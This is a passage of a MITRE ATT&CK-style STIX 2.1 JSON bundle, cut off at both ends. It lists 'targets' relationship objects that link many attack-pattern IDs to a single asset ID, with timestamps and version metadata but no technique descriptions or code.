"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42d4c170-fb75-4684-affc-6c40b2cd5b8c", "created": "2024-07-01T10:37:15.819497", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819499", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b2c711d-a316-4d10-8e85-af2eb866d742", "created": "2024-07-01T10:37:15.819507", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819509", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a3908ab-4058-490e-8d5e-842b6e4c65a9", "created": "2024-07-01T10:37:15.819518", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819520", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--06f459a9-5519-4473-8d96-d24698f20892", "created": "2024-07-01T10:37:15.819528", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819530", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c74f1481-899b-4faa-bd00-aff743a76767", "created": "2024-07-01T10:37:15.819538", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819540", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--35d47160-a4db-4f7a-a42f-70652c4f942f", "created": "2024-07-01T10:37:15.819548", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819550", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--576201f0-7e68-4646-8cef-93d710416ca8", "created": "2024-07-01T10:37:15.819558", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819560", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8769ead4-6209-4562-968d-8140b9bd199e", "created": "2024-07-01T10:37:15.819569", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819571", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2a55575-1790-40f6-a5ac-6a84d3aee8e3", "created": "2024-07-01T10:37:15.819579", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819581", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1797c6b8-7ee5-4fdf-82aa-61e78961f931", "created": "2024-07-01T10:37:15.819589", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819591", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96c86baa-b351-4a45-9062-bbe55ddacb8c", "created": "2024-07-01T10:37:15.819599", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819601", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7912250c-97a8-42be-9eeb-6fb812dfbe7d", "created": "2024-07-01T10:37:15.819609", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819611", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28952bcd-f740-4a1c-bf72-57950f826558", "created": "2024-07-01T10:37:15.819619", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819621", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79c24e99-e956-474a-ace0-9cb33c996bc5", "created": "2024-07-01T10:37:15.819629", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819631", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ac1b0b15-e537-4946-823d-2f4c603028d5", "created": "2024-07-01T10:37:15.819640", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819642", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fa45428d-2e6e-4503-acf9-558dd076025c", "created": "2024-07-01T10:37:15.819650", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819652", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--55611883-769c-4960-ae38-9d0f969f27fb", "created": "2024-07-01T10:37:15.819660", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819662", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--914b7c0c-2a36-4e79-a869-2d07707dd082", "created": "2024-07-01T10:37:15.819671", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819673", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc0ce88d-bc12-406e-9c26-57ce696ce583", "created": "2024-07-01T10:37:15.819774", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819776", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a9c4d6e-aa8b-4bb6-aa90-6b27631583f9", "created": "2024-07-01T10:37:15.819786", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819788", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f71aa713-a2d6-4922-97bc-07091067b7aa", "created": "2024-07-01T10:37:15.819797", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819799", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9235431a-4444-4801-9f2c-b4ba07350765", "created": "2024-07-01T10:37:15.819807", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819809", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65e211bb-0a56-4dba-a8f9-3aee029a4eaf", "created": "2024-07-01T10:37:15.819817", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819819", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afe09c73-5bc6-4b19-b454-9909fdf3ae15", "created": "2024-07-01T10:37:15.819827", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819829", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2573e9a-ee09-4d73-a920-b066e1ff4b22", "created": "2024-07-01T10:37:15.819837", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819839", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b532db6-a910-46a8-9f25-17feb984bfe2", "created": "2024-07-01T10:37:15.819847", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819849", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02b9828b-7976-4f8e-a38b-7989e6e67524", "created": "2024-07-01T10:37:15.819857", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819859", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33e79560-576f-4f11-8b74-580c73ce96e6", "created": "2024-07-01T10:37:15.819867", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819869", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--351b8651-52f0-4599-b7a0-fcebda4e2a28", "created": "2024-07-01T10:37:15.819878", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819880", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea4e9b33-79a7-4d39-b773-bb9af6c8aea9", "created": "2024-07-01T10:37:15.819888", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819890", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a765ccf0-99d9-424f-90dc-3105fe56e2d4", "created": "2024-07-01T10:37:15.819898", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819901", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0392f5ae-4276-4138-8139-b9286e964726", "created": "2024-07-01T10:37:15.819909", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819911", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f98e7271-9e3f-4f3c-8528-f491c9df7717", "created": "2024-07-01T10:37:15.819919", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819921", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6d7766fb-38e5-4ca4-938a-b198079cf55e", "created": "2024-07-01T10:37:15.819929", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819932", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f7bfcd7-85ae-41d5-9fb8-df9f906400b6", "created": "2024-07-01T10:37:15.819939", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819942", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df94287a-7404-4275-a6ca-56b1cdb1b59d", "created": "2024-07-01T10:37:15.819950", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819952", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b03a5c1d-a09d-44fc-95e1-4d24a0e62ad6", "created": "2024-07-01T10:37:15.819960", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819962", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d4b3293-52c8-4f19-af20-5c40a6198138", "created": "2024-07-01T10:37:15.819970", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819973", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47297329-c37a-4107-acb1-89c5d0e04a0c", "created": "2024-07-01T10:37:15.819981", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819983", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9850d777-ce10-4dab-afbd-65ca6a100850", "created": "2024-07-01T10:37:15.819991", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819993", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0cbab688-96a5-49fd-b9d3-c6cfd986361a", "created": "2024-07-01T10:37:15.820001", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820003", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": 